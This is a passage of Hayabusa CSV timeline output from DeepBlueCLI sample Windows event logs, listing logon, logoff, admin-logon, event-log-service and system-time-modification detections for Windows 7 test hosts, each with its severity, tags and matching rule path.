Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 21:55:44.840 +00:00,IE8Win7,4624,info,,Logon Type 4 - Batch,User: IEUser | Computer: IE8WIN7 | IP Addr: - | LID: 0x13dbc,rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 21:55:44.840 +00:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: - | Process: C:\Windows\System32\svchost.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 21:55:44.840 +00:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x13dbc,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 22:00:55.356 +00:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0xdafc,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 22:00:55.903 +00:00,IE8Win7,4634,info,,Logoff,User: IEUser | LID: 0xdafc,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 22:00:55.903 +00:00,IE8Win7,4634,info,,Logoff,User: IEUser | LID: 0xdad4,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 22:01:28.840 +00:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x4bafc | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 22:01:28.840 
+00:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x4bb14 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 22:01:28.840 +00:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 22:01:28.840 +00:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x4bafc,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 22:04:16.809 +00:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x4bb14,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 22:04:18.000 +00:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 22:05:21.859 +00:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 22:05:25.000 +00:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 22:05:32.609 +00:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0xd99e | (Warning: Credentials are stored in 
memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 22:05:32.609 +00:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0xd9c6 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 22:05:32.609 +00:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 22:05:32.609 +00:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0xd99e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 22:05:36.944 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 22:05:40.928 +00:00,IE8Win7,4624,info,,Logon Type 4 - Batch,User: IEUser | Computer: IE8WIN7 | IP Addr: - | LID: 0x144df,rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 22:05:40.928 +00:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: - | Process: C:\Windows\System32\svchost.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 22:05:40.928 +00:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 
0x144df,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 23:11:15.779 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-21 23:29:47.424 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-21 23:32:12.657 +00:00,IE8Win7,4634,info,,Logoff,User: IEUser | LID: 0x144df,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-21 23:34:00.063 +00:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IEUser | Target User: rdavis | IP Address: - | Process: | Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-21 23:40:48.532 +00:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0xd9c6,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-21 23:41:16.000 +00:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-21 23:42:34.625 +00:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-21 23:42:37.000 +00:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-21 23:42:49.610 
+00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-21 23:43:06.625 +00:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x16559 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-21 23:43:06.625 +00:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x16589 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-21 23:43:06.625 +00:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-21 23:43:06.625 +00:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x16559,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-21 23:44:23.849 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 00:44:32.677 +00:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x16589,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 01:43:32.000 +00:00,IE8Win7,6006,info,,Event Log Service 
Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 05:07:26.562 +00:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-24 05:07:37.000 +00:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 05:07:42.189 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-24 05:08:08.126 +00:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x2b7c0 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-24 05:08:08.126 +00:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x2b7f0 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-24 05:08:08.126 +00:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-24 05:08:08.126 +00:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 
0x2b7c0,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-25 17:18:43.562 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-25 17:25:02.877 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-25 17:48:26.739 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-25 17:57:33.848 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-25 18:01:39.454 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-25 18:02:36.847 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-25 18:05:40.910 +00:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IEUser | Target User: rdavis | IP Address: - | Process: | Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-25 21:49:55.313 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-25 
21:50:49.109 +00:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x2b7f0,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-25 21:51:44.000 +00:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-25 21:52:36.312 +00:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-25 21:52:38.000 +00:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-25 21:52:48.955 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-25 21:54:52.158 +00:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0xcf564 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-25 21:54:52.158 +00:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0xcf598 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-25 21:54:52.158 +00:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: 
localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-25 21:54:52.158 +00:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0xcf564,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-25 22:23:56.575 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-25 22:26:20.278 +00:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IEUser | Target User: rdavis | IP Address: - | Process: | Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-25 22:35:01.091 +00:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0xcf598,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-25 22:36:37.000 +00:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-25 22:38:20.765 +00:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-25 22:38:21.000 +00:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-25 22:38:26.183 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 
+2014-11-25 22:38:48.104 +00:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x27008 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-25 22:38:48.104 +00:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x27038 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-25 22:38:48.104 +00:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-25 22:38:48.104 +00:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x27008,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-25 22:48:51.643 +00:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x27038,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-25 22:50:17.000 +00:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-25 22:51:16.890 +00:00,IE9Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-25 22:51:19.000 +00:00,IE9Win7,6005,info,,Event Log Service 
Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-25 22:51:29.601 +00:00,IE9Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-25 22:51:34.460 +00:00,IE9Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE9WIN7 | IP Addr: 127.0.0.1 | LID: 0x12048 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-25 22:51:34.460 +00:00,IE9Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE9WIN7 | IP Addr: 127.0.0.1 | LID: 0x12070 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-25 22:51:34.460 +00:00,IE9Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE9WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-25 22:51:34.460 +00:00,IE9Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x12048,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-25 23:03:14.476 +00:00,IE9Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x12070,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-25 23:03:47.000 +00:00,IE9Win7,6006,info,,Event Log Service 
Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 17:34:54.687 +00:00,IE9Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 17:34:56.000 +00:00,IE9Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 17:35:04.667 +00:00,IE9Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 17:35:09.745 +00:00,IE9Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE9WIN7 | IP Addr: 127.0.0.1 | LID: 0x131c3 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 17:35:09.745 +00:00,IE9Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE9WIN7 | IP Addr: 127.0.0.1 | LID: 0x13216 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 17:35:09.745 +00:00,IE9Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE9WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 17:35:09.745 +00:00,IE9Win7,4672,info,,Admin Logon,User: IEUser | LID: 
0x131c3,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 17:35:57.635 +00:00,IE9Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IEUser | Target User: rdavis | IP Address: - | Process: | Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 17:41:21.932 +00:00,IE9Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x13216,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 17:42:44.000 +00:00,IE9Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 17:43:31.734 +00:00,IE9Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 17:43:34.000 +00:00,IE9Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 17:43:56.893 +00:00,IE9Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 17:44:39.689 +00:00,IE9Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE9WIN7 | IP Addr: 127.0.0.1 | LID: 0x36aed | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 17:44:39.689 +00:00,IE9Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE9WIN7 | IP 
Addr: 127.0.0.1 | LID: 0x36b1d | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 17:44:39.689 +00:00,IE9Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE9WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 17:44:39.689 +00:00,IE9Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x36aed,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 17:59:00.431 +00:00,IE9Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 18:15:07.962 +00:00,IE9Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x36b1d,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 18:16:14.000 +00:00,IE9Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 18:17:04.250 +00:00,IE10Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 18:17:05.000 +00:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 18:17:13.369 +00:00,IE10Win7,4616,medium,Evas,Unauthorized System Time 
